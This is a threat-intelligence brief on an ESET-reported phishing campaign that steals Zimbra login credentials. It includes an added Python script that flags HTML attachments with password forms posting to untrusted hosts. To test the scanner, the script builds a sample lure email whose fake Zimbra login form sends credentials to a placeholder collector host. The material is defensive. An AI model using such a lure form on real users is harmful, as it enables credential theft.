ESET researchers have discovered an ongoing phishing campaign targeting users of the Zimbra Collaboration software platform. The campaign, active since at least April 2023, aims to harvest the credentials of Zimbra account users.

Infection process

The campaign uses social engineering lures such as a pending email server update, an impending account deactivation, or a similar administrative issue to pressure recipients into acting.
  • The phishing email purports to come from the email server administrator and carries an HTML attachment that, when opened, presents a fake Zimbra login page. 
  • In some cases the attackers have used already-compromised Zimbra accounts to send subsequent waves of phishing emails, so later messages arrive from legitimate internal addresses. 
  • Credentials entered into the fake login form are collected and sent to a server controlled by the attacker.
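
As an added example (not ESET's or Cyware's code), the following Python script shows one detection check a mail gateway or an analyst could apply to this kind of lure: it parses a raw email, pulls out HTML attachments, and flags any form that contains a password field and submits to a host other than the organization's own Zimbra server. The sample message, the trusted host mail.example.org and the collector host collector.example are constructed placeholders for the example, not indicators from the campaign.

```python
"""Flag HTML email attachments that carry a credential-harvesting login form.

Added example, not code from ESET or Cyware. The trusted-host list, the
sample message and the collector host are assumptions made for this demo.
"""
import email
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the organisation's real Zimbra web client lives here.
TRUSTED_HOSTS = {"mail.example.org"}


class _FormScanner(HTMLParser):
    """Record every <form>'s action and whether it contains a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []        # each entry: {"action": str, "has_password": bool}
        self._current = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)        # attribute values may be None for bare attributes
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html_text, trusted_hosts=TRUSTED_HOSTS):
    """Return the action URLs of password forms that post to an untrusted host."""
    scanner = _FormScanner()
    scanner.feed(html_text)
    hits = []
    for form in scanner.forms:
        if not form["has_password"]:
            continue
        host = urlparse(form["action"]).hostname or ""
        # A relative action in a file opened from disk goes nowhere useful;
        # an absolute URL pointing at a foreign host is the tell-tale sign.
        if host and host not in trusted_hosts:
            hits.append(form["action"])
    return hits


def scan_message(raw_bytes, trusted_hosts=TRUSTED_HOSTS):
    """Walk a raw RFC 822 message; return [(attachment filename, [bad actions])]."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        # The HTML body of an ordinary email is not an attachment; skip it.
        if part.get_content_disposition() != "attachment":
            continue
        hits = suspicious_forms(part.get_content(), trusted_hosts)
        if hits:
            findings.append((part.get_filename(), hits))
    return findings


def build_sample_message():
    """Constructed lure: a 'server update' notice with an HTML attachment whose
    login form (username pre-filled) posts to a placeholder collector host."""
    lure_html = (
        "<html><body><h2>Zimbra Web Client</h2>\n"
        '<form method="post" action="https://collector.example/zimbra/login">\n'
        '  <input type="text" name="username" value="victim@example.org">\n'
        '  <input type="password" name="password">\n'
        '  <input type="submit" value="Sign In">\n'
        "</form></body></html>\n"
    )
    msg = EmailMessage()
    msg["From"] = "postmaster@example.org"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "Email server update - action required"
    msg.set_content("Your mailbox will be deactivated unless you update your "
                    "account using the attached form.")
    msg.add_attachment(lure_html, subtype="html", filename="update-account.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for filename, actions in scan_message(build_sample_message()):
        print(f"suspicious attachment {filename}: posts credentials to {actions}")
```

The check deliberately ignores forms with relative actions: a login page saved to disk and opened locally cannot reach the real server that way, so only absolute URLs to foreign hosts are flagged. A production rule would also want to inspect script blocks that set the form action at runtime, and to treat any HTML attachment containing a password field as worth quarantining for review.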

Despite its low sophistication, the campaign has been successful, largely because the Zimbra Collaboration suite is widely deployed across organizations, which makes its user base a broad and attractive target for adversaries.

Targeted victims

  • The targets of the campaign include small and medium businesses as well as governmental entities.
  • The countries most affected by the campaign are Poland, Ecuador, and Italy. 

Worth noting 

The campaign examined by ESET relies solely on social engineering and user interaction; no vulnerability is exploited. That has not always been the case for attacks against Zimbra:
  • In a campaign disclosed by Proofpoint in March 2023, the APT group Winter Vivern (also known as TA473) exploited CVE-2022-27926, a cross-site scripting flaw in Zimbra Collaboration, to target the webmail portals of military, government, and diplomatic entities in European countries. 
  • In February 2022, Volexity reported that a group tracked as TEMP_Heretic extracted emails from European government and media organizations by exploiting another cross-site scripting vulnerability, CVE-2022-24682, in Zimbra Collaboration's Calendar feature.
  • Most recently, EclecticIQ researchers examined a campaign resembling the current one. The main difference is that the link to the fraudulent Zimbra login page is embedded directly in the email body rather than delivered as an HTML attachment.

Conclusion

Because the current campaign relies entirely on phishing emails, security teams should enforce email security controls, in particular close scrutiny of HTML attachments and of links that lead to login pages, and remind users to verify any unexpected server update or account deactivation notice with their administrators before entering credentials. Organizations should also apply the latest Zimbra security updates, since earlier Zimbra campaigns exploited known vulnerabilities, and block the IOCs published for this campaign at email gateways and endpoints.
Publisher: Cyware